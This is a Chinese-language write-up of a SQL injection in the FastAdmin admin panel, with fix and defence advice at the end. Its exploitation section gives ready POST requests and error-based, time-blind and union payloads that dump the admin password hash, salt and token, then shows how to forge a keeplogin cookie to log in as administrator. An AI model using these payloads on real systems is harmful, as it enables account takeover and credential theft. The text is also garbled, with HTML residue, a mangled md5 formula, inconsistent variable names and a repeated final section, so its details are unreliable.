FastAdmin 后台注入漏洞分析与利用<\/h1>

0x01 漏洞概述<\/h2>
FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架。在 V1.0.0.20191212_beta 及以下版本中存在后台 SQL 注入漏洞，攻击者可以利用该漏洞在低权限情况下获取管理员凭证，进而提升权限并最终获取系统控制权。<\/p>

0x02 漏洞影响版本<\/h2>

V1.0.0.20191212_beta 及以下版本<\/li> <\/ul>

0x03 FastAdmin 鉴权机制分析<\/h2>

FastAdmin 的鉴权流程主要通过 \/application\/common\/controller\/Backend.php<\/code> 文件实现：<\/p>

protected<\/span> $noNeedLogin =<\/span> [];    \/\/ 无需登录即可访问的方法
<\/span><\/span><\/span><\/span>protected<\/span> $noNeedRight =<\/span> [];    \/\/ 无需鉴权即可访问的方法
<\/span><\/span><\/span><\/span>
<\/span><\/span>public<\/span> function<\/span> _initialize<\/span>()
<\/span><\/span>{
<\/span><\/span>    \/\/ 获取当前请求的模块、控制器和方法
<\/span><\/span><\/span><\/span>    $modulename =<\/span> $this-><\/span>request<\/span>-><\/span>module<\/span>();
<\/span><\/span>    $controllername =<\/span> Loader<\/span>::<\/span>parseName<\/span>($this-><\/span>request<\/span>-><\/span>controller<\/span>());
<\/span><\/span>    $actionname =<\/span> strtolower<\/span>($this-><\/span>request<\/span>-><\/span>action<\/span>());
<\/span><\/span>    $path =<\/span> str_replace<\/span>('.'<\/span>, '\/'<\/span>, $controllername) .<\/span> '\/'<\/span> .<\/span> $actionname;
<\/span><\/span>    
<\/span><\/span>    \/\/ 检测是否需要验证登录
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>$this-><\/span>auth<\/span>-><\/span>match<\/span>($this-><\/span>noNeedLogin<\/span>)) {
<\/span><\/span>        \/\/ 检测是否登录
<\/span><\/span><\/span><\/span>        if<\/span> (!<\/span>$this-><\/span>auth<\/span>-><\/span>isLogin<\/span>()) {
<\/span><\/span>            \/\/ 未登录处理逻辑
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>        \/\/ 判断是否需要验证权限
<\/span><\/span><\/span><\/span>        if<\/span> (!<\/span>$this-><\/span>auth<\/span>-><\/span>match<\/span>($this-><\/span>noNeedRight<\/span>)) {
<\/span><\/span>            \/\/ 判断控制器和方法是否有对应权限
<\/span><\/span><\/span><\/span>            if<\/span> (!<\/span>$this-><\/span>auth<\/span>-><\/span>check<\/span>($path)) {
<\/span><\/span>                \/\/ 无权限处理逻辑
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>各控制器会继承 Backend 类并定义自己的 $noNeedLogin<\/code> 和 $noNeedRight<\/code> 数组。<\/p>
0x04 漏洞定位与分析<\/h2>
漏洞位于 \/application\/admin\/controller\/Ajax.php<\/code> 文件中的 weigh<\/code> 方法：<\/p>
public<\/span> function<\/span> weigh<\/span>()
<\/span><\/span>{
<\/span><\/span>    \/\/ 获取用户输入参数，未经过滤
<\/span><\/span><\/span><\/span>    $ids =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("ids"<\/span>);
<\/span><\/span>    $changeid =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("changeid"<\/span>);
<\/span><\/span>    $field =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("field"<\/span>);
<\/span><\/span>    $table =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("table"<\/span>);  \/\/ 可控参数
<\/span><\/span><\/span><\/span>    $pk =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("pk"<\/span>);       \/\/ 可控参数
<\/span><\/span><\/span><\/span>    $orderway =<\/span> strtolower<\/span>($this-><\/span>request<\/span>-><\/span>post<\/span>("orderway"<\/span>, ""<\/span>));
<\/span><\/span>    
<\/span><\/span>    \/\/ 直接拼接SQL语句
<\/span><\/span><\/span><\/span>    $list =<\/span> Db<\/span>::<\/span>name<\/span>($table)-><\/span>field<\/span>("<\/span>$prikey<\/span>,<\/span>$field<\/span>"<\/span>)-><\/span>where<\/span>($prikey, 'in'<\/span>, $ids)-><\/span>order<\/span>($field, $orderway)-><\/span>select<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键问题：<\/p>

$table<\/code> 和 $pk<\/code> 参数直接从用户输入获取，未经过滤<\/li>
参数直接拼接到 SQL 语句中执行<\/li>
<\/ol>
0x05 漏洞利用步骤<\/h2>
第一步：发现注入点<\/h3>
通过构造特殊请求触发 SQL 注入：<\/p>
POST \/admin\/ajax\/weigh HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

ids=2,4,1,3,5,6,8,9,7,10,11,12,13&changeid=1&pid=1&field=weigh&orderway=desc&pk=type&table=category union select 1,updatexml(1,concat(0x7e,(select user()),0x7e),1)%23
<\/code><\/pre>
第二步：时间盲注利用<\/h3>
当应用调试模式关闭时，可使用时间盲注：<\/p>
ids=2,4,1,3,5,6,8,9,7,10,11,12,13&changeid=1&pid=1&field=weigh&orderway=desc&pk=type&table=category+where+id=1+and+if(ascii(substr(database(),1,1)) in (0x66),sleep(2),1)%23
<\/code><\/pre>
第三步：获取管理员凭证<\/h3>
通过注入获取 fa_admin<\/code> 表中的管理员信息：<\/p>
table=category union select 1,concat(id,0x7c,username,0x7c,password,0x7c,salt,0x7c,token) from fa_admin limit 1%23
<\/code><\/pre>
第四步：构造自动登录 Cookie<\/h3>
FastAdmin 的自动登录机制通过 keeplogin<\/code> cookie 实现：<\/p>
\/\/ 自动登录验证逻辑
<\/span><\/span><\/span><\/span>$keeplogin =<\/span> Cookie<\/span>::<\/span>get<\/span>('keeplogin'<\/span>);
<\/span><\/span>list<\/span>($id, $keeptime, $expiretime, $key) =<\/span> explode<\/span>('|'<\/span>, $keeplogin);
<\/span><\/span>if<\/span> ($key ==<\/span> md5<\/span>(md5<\/span>($id) .<\/span> md5<\/span>($keeptime) .<\/span> md5<\/span>($expiretime) .<\/span> $admin-><\/span>token<\/span>)) {
<\/span><\/span>    \/\/ 自动登录成功
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>构造步骤：<\/p>

通过注入获取 id<\/code> 和 token<\/code><\/li>
设置 keeptime<\/code> (如86400)<\/li>
设置 expiretime<\/code> (需大于当前时间)<\/li>
计算 key<\/code> = md5(md5(\(id) . md5(\)<\/span>keeptime) . md5(\(expiretime) . \)<\/span>token)<\/li>
构造 keeplogin<\/code> = "\(id|\)<\/span>keeptime|\(expiretime|\)<\/span>key"<\/li>
<\/ol>
示例：<\/p>
id = 1
keeptime = 86400
expiretime = 1601902475
token = 43e78cd9-b16b-4f27-9648-d60fd0e9b464
key = md5(md5(1) + md5(86400) + md5(1601902475) + token) = 1fe1e4fc538e66089c4e24ed3b8e4c8c
keeplogin = 1|86400|1601902475|1fe1e4fc538e66089c4e24ed3b8e4c8c
<\/code><\/pre>
第五步：获取后台权限<\/h3>
设置构造的 keeplogin<\/code> cookie 后刷新页面即可自动登录管理员账户。<\/p>
0x06 漏洞修复方案<\/h2>
官方在后续版本中修复了此漏洞：<\/p>
$table =<\/span> $this-><\/span>request<\/span>-><\/span>post<\/span>("table"<\/span>);
<\/span><\/span>if<\/span> (!<\/span>Validate<\/span>::<\/span>is<\/span>($table, "alphaDash"<\/span>)) {
<\/span><\/span>    $this-><\/span>error<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>修复要点：<\/p>

对 $table<\/code> 参数进行严格过滤，只允许字母、数字、下划线和破折号<\/li>
在 V1.2.0.20201001_beta 版本中也对 $pk<\/code> 参数进行了过滤<\/li>
<\/ol>
0x07 防御建议<\/h2>

及时升级到最新版本<\/li>
对所有用户输入进行严格的过滤和验证<\/li>
使用预处理语句或ORM代替直接SQL拼接<\/li>
限制数据库用户的权限<\/li>
关闭错误回显，避免泄露敏感信息<\/li>
<\/ol>
0x08 总结<\/h2>
该漏洞展示了如何通过低权限的SQL注入点获取高权限凭证的技术路线，关键点在于：<\/p>

发现未过滤的参数直接拼接到SQL语句中<\/li>
利用注入获取管理员token等关键信息<\/li>
理解系统自动登录机制并构造有效cookie<\/li>
最终实现权限提升和系统控制<\/li>
<\/ol>
这种从低权限注入到高权限获取的技术路线在渗透测试中具有典型意义，值得安全研究人员深入理解和学习。<\/p>

FastAdmin 后台注入漏洞分析与利用<\/h1>

0x05 漏洞利用步骤<\/h2>

第五步：获取后台权限<\/h3> 设置构造的 keeplogin<\/code> cookie 后刷新页面即可自动登录管理员账户。<\/p>

第五步：获取后台权限<\/h3>
设置构造的 `keeplogin<\/code> cookie 后刷新页面即可自动登录管理员账户。<\/p>`